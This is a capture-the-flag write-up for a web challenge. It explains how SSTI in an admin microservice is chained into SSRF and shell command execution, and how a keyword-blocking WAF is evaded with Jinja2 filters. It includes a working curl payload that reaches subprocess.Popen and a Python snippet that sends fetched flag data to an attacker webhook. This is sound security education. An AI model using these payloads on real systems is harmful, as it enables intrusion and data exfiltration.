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Microservices Revenge

Category: Web


I've upgraded the security of this website and added a new feature. Can you still break it?

  • Junhua



  • This challenge appears to be a continuation of the previous Microservices challenge.
  • The flag can now only be obtained from the /flag endpoint of a new microservice at rflagpage.
  • Unfortunately, direct access to rflagpage is not possible, and we must go through the gateway.
  • However, specifying flagpage as the service query parameter to the gateway will redirect us to the /construction endpoint of rflagpage, as indicated by the specified routes.
    Text Only
    routes = {
        "adminpage": "http://radminpage",
        "homepage": "http://rhomepage",
        "flagpage": "http://rflagpage/construction",
  • We need to identify potential attack vectors that can be exploited to forward our request to http://rflagpage/flag.
  • It seems that http://rhomepage/ is vulnerable to Server-Side Template Injection (SSTI), as we can manipulate our user cookie to render malicious markup content, which is treated as safe HTML input.

  • Another attack vector we discovered is SSTI in http://radminpage/, where we can inject malicious markup content by manipulating the user cookie, as there is no input sanitization before rendering.

  • It is more promising to focus on the second attack vector, as we can attempt to leverage SSTI to achieve Server-Side Request Forgery (SSRF). The first attack vector primarily allows us to execute malicious client-side payloads, but it is unlikely to enable us to forward our request to rflagpage.
  • Since radminpage and rflagpage are in the same network, we aim to exploit the second SSTI vulnerability to make a request to http://rflagpage/flag via radminpage, retrieve its content, and then send it to our webhook by appending it.
  • However, there is a custom Web Application Firewall (WAF) method in the gateway called is_sus() that checks the service query parameter and the user cookie against a list of forbidden words.
    Text Only
    banned_chars = {
  • To bypass these checks, we can cleverly construct a payload that utilizes Jinja2 filters and additional query parameters.
  • By specifying banned strings in the query parameters and utilizing Jinja2 filters in our SSTI payload, we can slowly build our payload by retrieving banned content from our query parameters.
  • We can use subprocess.Popen which can be accessed via "".__class__.__subclasses__ with SSTI and execute inline Python code using python3 -c "<python code>".
  • The Python code we aim to execute is as follows:
    Text Only
    from urllib.request import urlopen
    from base64 import b64encode
    output = urlopen(\"http://rflagpage/flag\").read()
    output = b64encode(output).decode();
    urlopen(\"\" + output)"
  • The following curl request contains the necessary logic to exfiltrate the flag from http://rflagpage/flag and send it to our webhook URL:
    Text Only
    curl -b 'user={{""|attr(request|attr("args")|list|attr("pop")(1))|attr("mro")()|attr("pop")(1)|attr(request|attr("args")|list|attr("pop")(2))()|attr("pop")(343)(request|attr("args")|list|attr("pop")(3), shell=True) }}' "http://localhost:5005/?service=adminpage&__class__=0&__subclasses__=0&"

Flag: grey{55t1_bl4ck1ist_byp455_t0_S5rf_538ad457e9a85747631b250e834ac12d}